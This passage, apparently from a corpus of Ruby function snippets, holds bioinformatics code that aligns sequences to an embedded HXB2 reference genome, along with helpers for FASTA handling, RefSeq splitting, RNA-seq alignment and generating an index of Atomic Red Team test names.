GATGTGGGCGATGCATATTTTTCAGTTCCCTTAGATAAAGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCACAGGGATGGAAAGGATCACCAGCAATATTCCAGTGTAGCATGACAAAAATCTTAGAGCCTTTTAGAAAACAAAATCCAGACATAGTCATCTATCAATACATGGATGATTTGTATGTAGGATCTGACTTAGAAATAGGGCAGCATAGAACAAAAATAGAGGAACTGAGACAACATCTGTTGAGGTGGGGATTTACCACACCAGACAAAAAACATCAGAAAGAACCTCCATTCCTTTGGATGGGTTATGAACTCCATCCTGATAAATGGACAGTACAGCCTATAGTGCTGCCAGAAAAGGACAGCTGGACTGTCAATGACATACAGAAATTAGTGGGAAAATTGAATTGGGCAAGTCAGATTTATGCAGGGATTAAAGTAAGGCAATTATGTAAACTTCTTAGGGGAACCAAAGCACTAACAGAAGTAGTACCACTAACAGAAGAAGCAGAGCTAGAACTGGCAGAAAACAGGGAGATTCTAAAAGAAC
CGGTACATGGAGTGTATTATGACCCATCAAAAGACTTAATAGCAGAAATACAGAAGCAGGGGCAAGGCCAATGGACATATCAAATTTATCAAGAGCCATTTAAAAATCTGAAAACAGGAAAATATGCAAGAATGAAGGGTGCCCACACTAATGATGTGAAACAATTAACAGAGGCAGTACAAAAAATAGCCACAGAAAGCATAGTAATATGGGGAAAGACTCCTAAATTTAAATTACCCATACAAAAGGAAACATGGGAAGCATGGTGGACAGAGTATTGGCAAGCCACCTGGATTCCTGAGTGGGAGTTTGTCAATACCCCTCCCTTAGTGAAGTTATGGTACCAGTTAGAGAAAGAACCCATAATAGGAGCAGAAACTTTCTATGTAGATGGGGCAGCCAATAGGGAAACTAAATTAGGAAAAGCAGGATATGTAACTGACAGAGGAAGACAAAAAGTTGTCCCCCTAACGGACACAACAAATCAGAAGACTGAGTTACAAGCAATTCATCTAGCTTTGCAGGATTCGGGATTAGAAGTAAACATAGTGACAGACTCACAATATGCATTGGGAATCATTCAAGCACAACCAGATAAGAGTGAATCAGAGTTAGTCAGTCAAATAATAGAGCAGTTAATAAAAAAGGAAAAAGTCTACCTGGCATGGGTACCAGCACACAAAGGAATTGGAGGAAATGAACAAGTAGATGGGTTGGTCAGTGCTGGAATCAGGAAAGTACTATTTTTAGATGGAATAGATAAGGCCCAAGAAGAACATGAGAAATATCACAGTAATTGGAGAGCAATGGCTAGTGATTTTAACCTACCACCTGTAGTAGCAAAAGAAATAGTAGCCAGCTGTGATAAATGTCAGCTAAAAGGGGAAGCCATGCATGGACAAGTAGACTGTAGCCCAGGAATATGGCAGCTAGATTGTACACATTTAGAAGGAAAAGTTATCTTGGTAGCAGTTCATGTAGCCAGTGGATATATAGAAGCAGAAGTAATTCCAGCAGAGACAGGGCAAGAAACAGCATACTTCCTCTTAAAATTAGCAGGAAGATGGCCAGTAAAAACAGTACATACAGACAATGGCAGCAATTTCACCAGTACTACAGTTAAGGCCGCCTGTTGGTGGGCGGGGATCAAGCAGGAATTTGGCATTCCCTACAATCCCCAAAGTCAAGGAGTAATAGAATCTATGAATAAAGAATTAAAGAAAATTATAGGACAGGTAAGAGATCAGGCTGAACATCTTAAGACAGCAGTACAAATGGCAGTATTCATCCACAATTTTAAAAGAAAAGGGGGGATTGGGGGGTACAGTGCAGGGGAAAGAATAGTAGACATAATAGCAACAGACATACAAACTAAAGAATTACAAAAACAAATTACAAAAATTCAAAATTTTCGGGTTTATTACAGGGACAGCAGAGATCCAGTTTGGAAAGGACCAGCAAAGCTCCTCTGGAAAGGTGAAGGGGCAGTAGTAATACAAGATAATAGTGACATAAAAGTAGTGCCAAGAAGAAAAGCAAAGATCATCAGGGATTATGGAAAACAGATGGCAGGTGATGATTGTGTGGCAAGTAGACAGGATGAGGATTAACACATGGAAAAGATTAGTAAAACACCATATGTATATTTCAAGGAAAGCTAAGGACTGGTTTTATAGACATCACTATGAAAGTACTAATCCAAAAATAAGTTCAGAAGTACACATCCCACTAGGGGATGCTAAATTAGTAATAACAACATATTGGGGTCTGCATACAGGAGAAAGAGACTGGCATTTGGGTCAGGGAGTCTCCATAGAATGGAGGAAAAAGAGATATAGCACACAAGTAGACCCTGACCTAGCAGACCAACTAATTCATCTGCACTATTTTGATTGTTTTTCAGAATCTGCTATAAGAAATACCATATTAGGACGTATAGTTAGTCCTAGGTGTGAATATCAAGCAGGACATAACAAGGTAGGATCTCTACAGTACTTGGCACTAGCAGCATTAATAAAACCAAAACAGATAAAGCCACCTTTGCCTAGTGTTAGGAAACTGACAGAGGACAGATGGAACAAGCCCCAGAAGACCAAGGGCCACAGAGGGAGCCATACAATGAATGGACACTAGAGCTTTTAGAGGAACTTAAGAGTGAAGCTGTTAGACATTTTCCTAGGATATGGCTCCATAACTTAGGACAACATATCTATGAAACTTACGGGGATACTTGGGCAGGAGTGGAAGCCATAATAAGAATTCTGCAACAACTGCTGTTTATCCATTTCAGAATTGGGTGTCGACATAGCAGAATAGGCGTTACTCGACAGAGGAGAGCAAGAAATGGAGCCAGTAGATCCTAGACTAGAGCCCTGGAAGCATCCAGGAAGTCAGCCTAAAACTGCTTGTACCAATTGCTATTGTAAAAAGTGTTGCTTTCATTGCCAAGTTTGTTTCATGACAAAAGCCTTAGGCATCTCCTATGGCAGGAAGAAGCGGAGACAGCGACGAAGAGCTCATCAGAACAGTCAGACTCATCAAGCTTCTCTATCAAAGCAGTAAGTAGTACATGTAATGCAACCTATAATAGTAGCAATAGTAGCATTAGTAGTAGCAATAATAATAGCAATAGTTGTGTGGTCCATAGTAATCATAGAATATAGGAAAATATTAAGACAAAGAAAAATAGACAGGTTAATTGATAGACTAATAGAAAGAGCAGAAGACAGTGGCAATGAGAGTGAAGGAGAAGTATCAGCACTTGTGGAGATGGGGGTGGAAATGGGGCACCATGCTCCTTGGGATATTGATGATCTGTAGTGCTACAGAAAAATTGTGGGTCACAGTCTATTATGGGGTACCTGTGTGGAAGGAAGCAACCACCACTCTATTTTGTGCATCAGATGCTAAAGCATATGATACAGAGGTACATAATGTTTGGGCCACACATGCCTGTGTACCCACAGACCCCAACCCACAAGAAGTAGTATTGGTAAATGTGACAGAAAATTTTAACATGTGGAAAAATGACATGGTAGAACAGATGCATGAGGATATAATCAGTTTATGGGATCAAAGCCTAAAGCCATGTGTAAAATTAACCCCACTCTGTGTTAGTTTAAAGTGCACTGATTTGAAGAATGATACTAATACCAATAGTAGTAGCGGGAGAATGATAATGGAGAAAGGAGAGATAAAAAACTGCTCTTTCAATATCAGCACAAGCATAAGAGATAAGGTGCAGAAAGAATATGCATTCTTTTATAAACTTGATATAGTACCAATAGATAATACCAGCTATAGGTTGATAAGTTGTAACACCTCAGTCATTACACAGGCCTGTCCAAAGGTATCCTTTGAGCCAATTCCCATACATTATTGTGCCCCGGCTGGTTTTGCGATTCTAAAATGTAATAATAAGACGTTCAATGGAACAGGACCATGTACAAATGTCAGCACAGTACAATGTACACATGGAATCAGGCCAGTAGTATCAACTCAACTGCTGTTAAATGGCAGTCTAGCAGAAGAAGATGTAGTAATTAGATCTGCCAA
TTTCACAGACAATGCTAAAACCATAATAGTACAGCTGAACACATCTGTAGAAATTAATTGTACAAGACCCAACAACAATACAAGAAAAAGTATCCGTATCCAGAGGGGACCAGGGAGAGCATTTGTTACAATAGGAAAAATAGGAAATATGAGACAAGCACATTGTAACATTAGTAGAGCAAAATGGAATGCCACTTTAAAACAGATAGCTAGCAAATTAAGAGAACAATTTGGAAATAATAAAACAATAATCTTTAAGCAATCCTCAGGAGGGGACCCAGAAATTGTAACGCACAGTTTTAATTGTGGAGGGGAATTTTTCTACTGTAATTCAACACAACTGTTTAATAGTACTTGGTTTAATAGTACTTGGAGTACTGAAGGGTCAAATAACACTGAAGGAAGTGACACAATCACACTCCCATGCAGAATAAAACAATTTATAAACATGTGGCAGGAAGTAGGAAAAGCAATGTATGCCCCTCCCATCAGTGGACAAATTAGATGTTCATCAAATATTACTGGGCTGCTATTAACAAGAGATGGTGGTAATAACAACAATGGGTCCGAGATCTTCAGACCTGGAGGAGGCGATATGAGGGACAATTGGAGAAGTGAATTATATAAATATAAAGTAGTAAAAATTGAACCATTAGGAGTAGCACCCACCAAGGCAAAGAGAAGAGTGGTGCAGAGAGAAAAAAGAGCAGTGGGAATAGGAGCTTTGTTCCTTGGGTTCTTGGGAGCAGCAGGAAGCACTATGGGCTGCACGTCAATGACGCTGACGGTACAGGCCAGACAATTATTGTCTGATATAGTGCAGCAGCAGAACAATTTGCTGAGGGCTATTGAGGCGCAACAGCATCTGTTGCAACTCACAGTCTGGGGCATCAAACAGCTCCAGGCAAGAATCCTGGCTGTGGAAAGATACCTAAAGGATCAACAGCTCCTGGGGATTTGGGGTTGCTCTGGAAAACTCATTTGCACCACTGCTGTGCCTTGGAATGCTAGTTGGAGTAATAAATCTCTGGAACAGATTTGGAATAACATGACCTGGATGGAGTGGGACAGAGAAATTAACAATTACACAAGCTTAATACACTCCTTAATTGAAGAATCGCAAAACCAGCAAGAAAAGAATGAACAAGAATTATTGGAATTAGATAAATGGGCAAGTTTGTGGAATTGGTTTAACATAACAAATTGGCTGTGGTATATAAAATTATTCATAATGATAGTAGGAGGCTTGGTAGGTTTAAGAATAGTTTTTGCTGTACTTTCTATAGTGAATAGAGTTAGGCAGGGATATTCACCATTATCGTTTCAGACCCACCTCCCAATCCCGAGGGGACCCGACAGGCCCGAAGGAATAGAAGAAGAAGGTGGAGAGAGAGACAGAGACAGATCCATTCGATTAGTGAACGGATCCTTAGCACTTATCTGGGACGATCTGCGGAGCCTGTGCCTCTTCAGCTACCACCGCTTGAGAGACTTACTCTTGATTGTAACGAGGATTGTGGAACTTCTGGGACGCAGGGGGTGGGAAGCCCTCAAATATTGGTGGAATCTCCTACAGTATTGGAGTCAGGAACTAAAGAATAGTGCTGTTAACTTGCTCAATGCCACAGCCATAGCAGTAGCTGAGGGGACAGATAGGGTTATAGAAGTATTACAAGCAGCTTATAGAGCTATTCGCCACATACCTAGAAGAATAAGACAGGGCTTGGAAAGGATTTTGCTATAAGATGGGTGGCAAGTGGTCAAAAAGTAGTGTGATTGGATGGCCTGCTGTAAGGGAAAGAATGAGACGAGCTGAGCCAGCAGCAGATGGGGTGGGAGCAGTATCTCGAGACCTAGAAAAACATGGAGCAATCACAAGTAGCAATACAGCAGCTAACAATGCTGCTTGTGCCTGGCTAGAAGCACAAGAGGAGGAAGAGGTGGGTTTTCCAGTCACACCTCAGGTACCTTTAAGACCAATGACTTACAAGGCAGCTGTAGATCTTAGCCACTTTTTAAAAGAAAAGGGGGGACTGGAAGGGCTAATTCACTCCCAAAGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTGGCAGAACTACACACCAGGGCCAGGGGTCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGATAAGGTAGAAGAGGCCAATAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGAATGGATGACCCTGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACGTGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATGCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCACCCAGGAGGTAGAGGTTGCAGTGAGCCAAGATCGCGCCACTGCATTCCAGCCTGGGCAAGAAAACAAGACTGTCTAAAATAATAATAATAAGTTAAGGGTATTAAATATATTTATACATGGAGGTCATAAAAATATATATATTTGGGCTGGGCGCAGTGGCTCACACCTGCGCCCGGCCCTTTGGGAGGCCGAGGCAGGTGGATCACCTGAGTTTGGGAGTTCCAGACCAGCCTGACCAACATGGAGAAACCCCTTCTCTGTGTATTTTTAGTAGATTTTATTTTATGTGTATTTTATTCACAGGTATTTCTGGAAAACTGAAACTGTTTTTCCTCTACTCTGATACCACAAGAATCATCAGCACAGAGGAAGACTTCTGTGATCAAATGTGGTGGGAGAGGGAGGTTTTCACCAGCACATGAGCAGTCAGTTCTGCCGCAGACTCGGCGGGTGTCCTTCGGTTCAGTTCCAACACCGCCTGCCTGGAGAGAGGTCAGACCACAGGGTGAGGGCTCAGTCCCCAAGACATAAACACCCAAGACATAAACACCCAACAGGTCCACCCCGCCTGCTGCCCAGGCAGAGCCGATTCACCAAGACGGGAATTAGGATAGAGAAAGAGTAAGTCACACAGAGCCGGCTGTGCGGGAGAACGGAGTTCTATTATGACTCAAATCAGTCTCCCCAAGCATTCGGGGATCAGAGTTTTTAAGGATAACTTAGTGTGTAGGGGGCCAGTGAGTTGGAGATGAAAGCGTAGGGAGTCGAAGGTGTCCTTTTGCGCCGAGTCAGTTCCTGGGTGGGGGCCACAAGATCGGATGAGCCAGTTTATCAATCCGGGGGTGCCAGCTGATCCATGGAGTGCAGGGTCTGCAAAATATCTCAA
GCACTGATTGATCTTAGGTTTTACAATAGTGATGTTACCCCAGGAACAATTTGGGGAAGGTCAGAATCTTGTAGCCTGTAGCTGCATGACTCCTAAACCATAATTTCTTTTTTGTTTTTTTTTTTTTATTTTTGAGACAGGGTCTCACTCTGTCACCTAGGCTGGAGTGCAGTGGTGCAATCACAGCTCACTGCAGCCTCAACGTCGTAAGCTCAAGCGATCCTCCCACCTCAGCCTGCCTGGTAGCTGAGACTACAAGCGACGCCCCAGTTAATTTTTGTATTTTTGGTAGAGGCAGCGTTTTGCCGTGTGGCCCTGGCTGGTCTCGAACTCCTGGGCTCAAGTGATCCAGCCTCAGCCTCCCAAAGTGCTGGGACAACCGGGCCCAGTCACTGCACCTGGCCCTAAACCATAATTTCTAATCTTTTGGCTAATTTGTTAGTCCTACAAAGGCAGTCTAGTCCCCAGCAAAAAGGGGGTTTGTTTCGGGAAAGGGCTGTTACTGTCTTTGTTTCAAACTATAAACTAAGTTCCTCCTAAACTTAGTTCGGCCTACACCCAGGAATGAACAAGGAGAGCTTGGAGGTTAGAAGCACGATGGAATTGGTTAGGTCAGATCTCTTTCACTGTCTGAGTTATAATTTTGCAATGGTGGTTCAAAGACTGCCCGCTTCTGACACCAGTCGCTGCATTAATGAATCGGCCAACGCGCGGGGAGAGGCGGTTTGCGTATTGGGCGCTCTTCCGCTTCCTCGCTCACTGACTCGCTGCGCTCGGTCGTTCGGCTGCGGCGAGCGGTATCAGCTCACTCAAAGGCGGTAATACGGTTATCCACAGAATCAGGGGATAACGCAGGAAAGAACATGTGAGCAAAAGGCCAGCAAAAGGCCAGGAACCGTAAAAAGGCCGCGTTGCTGGCGTTTTTCCATAGGCTCCGCCCCCCTGACGAGCATCACAAAAATCGACGCTCAAGTCAGAGGTGGCGAAACCCGACAGGACTATAAAGATACCAGGCGTTTCCCCCTGGAAGCTCCCTCGTGCGCTCTCCTGTTCCGACCCTGCCGCTTACCGGATACCTGTCCGCCTTTCTCCCTTCGGGAAGCGTGGCGCTTTCTCATAGCTCACGCTGTAGGTATCTCAGTTCGGTGTAGGTCGTTCGCTCCAAGCTGGGCTGTGTGCACGAACCCCCCGTTCAGCCCGACCGCTGCGCCTTATCCGGTAACTATCGTCTTGAGTCCAACCCGGTAAGACACGACTTATCGCCACTGGCAGCAGCCACTGGTAACAGGATTAGCAGAGCGAGGTATGTAGGCGGTGCTACAGAGTTCTTGAAGTGGTGGCCTAACTACGGCTACACTAGAAGGACAGTATTTGGTATCTGCGCTCTGCTGAAGCCAGTTACCTTCGGAAAAAGAGTTGGTAGCTCTTGATCCGGCAAACAAACCACCGCTGGTAGCGGTGGTTTTTTTGTTTGCAAGCAGCAGATTACGCGCAGAAAAAAAGGATCTCAAGAAGATCCTTTGATCTTTTCTACGGGGTCTGACGCTCAGTGGAACGAAAACTCACGTTAAGGGATTTTGGTCATGAGATTATCAAAAAGGATCTTCACCTAGATCCTTTTAAATTAAAAATGAAGTTTTAAATCAATCTAAAGTATATATGAGTAAACTTGGTCTGACAGTTACCAATGCTTAATCAGTGAGGCACCTATCTCAGCGATCTGTCTATTTCGTTCATCCATAGTTGCCTGACTCCCCGTCGTGTAGATAACTACGATACGGGAGGGCTTACCATCTGGCCCCAGTGCTGCAATGATACCGCGAGACCCACGCTCACCGGCTCCAGATTTATCAGCAATAAACCAGCCAGCCGGAAGGGCCGAGCGCAGAAGTGGTCCTGCAACTTTATCCGCCTCCATCCAGTCTATTAATTGTTGCCGGGAAGCTAGAGTAAGTAGTTCGCCAGTTAATAGTTTGCGCAACGTTGTTGCCATTGCTACAGGCATCGTGGTGTCACGCTCGTCGTTTGGTATGGCTTCATTCAGCTCCGGTTCCCAACGATCAAGGCGAGTTACATGATCCCCCATGTTGTGCAAAAAAGCGGTTAGCTCCTTCGGTCCTCCGATCGTTGTCAGAAGTAAGTTGGCCGCAGTGTTATCACTCATGGTTATGGCAGCACTGCATAATTCTCTTACTGTCATGCCATCCGTAAGATGCTTTTCTGTGACTGGTGAGTACTCAACCAAGTCATTCTGAGAATAGTGTATGCGGCGACCGAGTTGCTCTTGCCCGGCGTCAATACGGGATAATACCGCGCCACATAGCAGAACTTTAAAAGTGCTCATCATTGGAAAACGTTCTTCGGGGCGAAAACTCTCAAGGATCTTACCGCTGTTGAGATCCAGTTCGATGTAACCCACTCGTGCACCCAACTGATCTTCAGCATCTTTTACTTTCACCAGCGTTTCTGGGTGAGCAAAAACAGGAAGGCAAAATGCCGCAAAAAAGGGAATAAGGGCGACACGGAAATGTTGAATACTCATACTCTTCCTTTTTCAATATTATTGAAGCATTTATCAGGGTTATTGTCTCATGAGCGGATACATATTTGAATGTATTTAGAAAAATAAACAAATAGGGGTTCCGCGCACATTTCCCCGAAAAGTGCCACCTGACGTCTAAGAAACCATTATTATCATGACATTAACCTATAAAAATAGGCGTATCACGAGGCCCTTTCGTCTCGCGCGTTTCGGTGATGACGGTGAAAACCTCTGACACATGCAGCTCCCGGAGACGGTCACAGCTTGTCTGTAAGCGGATGCCGGGAGCAGACAAGCCCGTCAGGGCGCGTCAGCGGGTGTTGGCGGGTGTCGGGGCTGGCTTAACTATGCGGCATCAGAGCAGATTGTACTGAGAGTGCACCATATGCGGTGTGAAATACCGCACAGATGCGTAAGGAGAAAATACCGCATCAGGCGCCATTCGCCATTCAGGCTGCGCAACTGTTGGGAAGGGCGATCGGTGCGGGCCTCTTCGCTATTACGCCAGGGGAGGCAGAGATTGCAGTAAGCTGAGATCGCAGCACTGCACTCCAGCCTGGGCGACAGAGTAAGACTCTGTCTCAAAAATAAAATAAATAAATCAATCAGATATTCCAATCTTTTCCTTTATTTATTTATTTATTTTCTATTTTGGAAACACAGTCCTTCCTTATTCCAGAATTACACATATATTCTATTTTTCTTTATATGCTCCAGTTTTTTTTAGACCTTCACCTGAAATGTGTGTATACAAAATCTAGGCCAGTCCAGCAGAGCCTAAAGGTAAAAAATAAAATAATAAAAAATAAATAAAATCTAGCTCACTCCTTCACATCAAAATGGAGATACAGCTGTTAGCATTAAATACCAAATAACCCATCTTGTCCTCAATAATTTTAAGCGCCTCTCTCCACCACATCTAACTCCTGTCAAAGGCATGTGCCCCTTCCGGGCGCTCTGCTGTGCTGCCAACCAACTGGCATGTGGACTCTGCAGGGTCCCTAACTGCCAAG
CCCCACAGTGTGCCCTGAGGCTGCCCCTTCCTTCTAGCGGCTGCCCCCACTCGGCTTTGCTTTCCCTAGTTTCAGTTACTTGCGTTCAGCCAAGGTCTGAAACTAGGTGCGCACAGAGCGGTAAGACTGCGAGAGAAAGAGACCAGCTTTACAGGGGGTTTATCACAGTGCACCCTGACAGTCGTCAGCCTCACAGGGGGTTTATCACATTGCACCCTGACAGTCGTCAGCCTCACAGGGGGTTTATCACAGTGCACCCTTACAATCATTCCATTTGATTCACAATTTTTTTAGTCTCTACTGTGCCTAACTTGTAAGTTAAATTTGATCAGAGGTGTGTTCCCAGAGGGGAAAACAGTATATACAGGGTTCAGTACTATCGCATTTCAGGCCTCCACCTGGGTCTTGGAATGTGTCCCCCGAGGGGTGATGACTACCTCAGTTGGATCTCCACAGGTCACAGTGACACAAGATAACCAAGACACCTCCCAAGGCTACCACAATGGGCCGCCCTCCACGTGCACATGGCCGGAGGAACTGCCATGTCGGAGGTGCAAGCACACCTGCGCATCAGAGTCCTTGGTGTGGAGGGAGGGACCAGCGCAGCTTCCAGCCATCCACCTGATGAACAGAACCTAGGGAAAGCCCCAGTTCTACTTACACCAGGAAAGGC\"\n hxb2_l = hxb2_ref.size\n head = \"\"\n 8.times {head << (65 + rand(25)).chr}\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n\n l1 = 0\n l2 = 0\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts hxb2_ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n if ref_size > 1.3*(seq.size)\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n max_seq = aln_test2.scan(/[ACGT]+/).max_by(&:length)\n aln_test2 =~ /#{max_seq}/\n before_aln_seq = $`\n before_aln = $`.size\n post_aln_seq = $'\n post_aln = $'.size\n before_aln_seq_size = before_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b1 = (1.3 * before_aln_seq_size).to_i\n post_aln_seq_size = post_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b2 = (1.3 * post_aln_seq_size).to_i\n if (before_aln > seq.size) and (post_aln <= seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1)]\n l1 = l1 + (before_aln - b1)\n elsif (post_aln > seq.size) and (before_aln <= seq.size)\n ref = ref[before_aln..(ref_size - post_aln - 1 + b2)]\n l2 = l2 + post_aln - b2\n elsif (post_aln > seq.size) and (before_aln > seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1 + b2)]\n l1 = l1 + (before_aln - b1)\n l2 = l2 + (post_aln - b2)\n end\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n end\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n\n if g1 == g2 and (s1 + g1 + s2) == ref.size\n if s1 > s2 and g2 > 2*s2\n ref = ref[0..(-g2-1)]\n repeat = 1\n l2 = l2 + g2\n elsif s1 < s2 and g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n else\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n\n while repeat == 1\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts 
\">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n #refine alignment\n\n if ref =~ /^(\\-+)/\n l1 = l1 - $1.size\n elsif ref =~ /(\\-+)$/\n l2 = l2 + $1.size\n end\n l1 = 0 if l1 < 0\n if (hxb2_l - l2 - 1) >= l1\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n ref_size = ref.size\n sim_count = 0\n (0..(ref_size-1)).each do |n|\n ref_base = ref[n]\n test_base = aln_test[n]\n sim_count += 1 if ref_base == test_base\n end\n similarity = (sim_count/ref_size.to_f*100).round(1)\n print `rm -f #{temp_file}`\n print `rm -f #{temp_aln}`\n loc_p1 = l1 + 1\n loc_p2 = hxb2_l - l2\n if seq.size != (loc_p2 - loc_p1 + 1)\n indel = true\n elsif aln_test.include?(\"-\")\n indel = true\n end\n return [loc_p1,loc_p2,similarity,indel,aln_test,ref]\n else\n return [0,0,0,0,0,0,0]\n end\nrescue\n return [0,0,0,0,\"N\",\"N\"]\nend",
"def reference(path)\n @reference_db = Bio::DB::Fasta::FastaFile.new(path)\n @reference_path = path\n end",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def generate_index!(title_prefix, output_doc_path, only_platform: /.*/)\n result = ''\n result += \"# #{title_prefix} Atomic Tests by ATT&CK Tactic & Technique\\n\"\n\n ATTACK_API.techniques_by_tactic(only_platform: only_platform).each do |tactic, techniques|\n result += \"# #{tactic}\\n\"\n techniques.each do |technique|\n result += \"- #{ATOMIC_RED_TEAM.github_link_to_technique(technique, include_identifier: true, link_new_to_contrib: true)}\\n\"\n ATOMIC_RED_TEAM.atomic_tests_for_technique(technique).each_with_index do |atomic_test, i|\n next unless atomic_test['supported_platforms'].any? {|platform| platform.downcase =~ only_platform}\n\n result += \" - Atomic Test ##{i+1}: #{atomic_test['name']} [#{atomic_test['supported_platforms'].join(', ')}]\\n\"\n end\n end\n result += \"\\n\"\n end\n\n File.write output_doc_path, result\n\n puts \"Generated Atomic Red Team index at #{output_doc_path}\"\n end",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def aref_prefix\n raise NotImplementedError\n end",
"def gtf_file\n\t\t\"#{pre}/transcripts.gtf\"\n\tend",
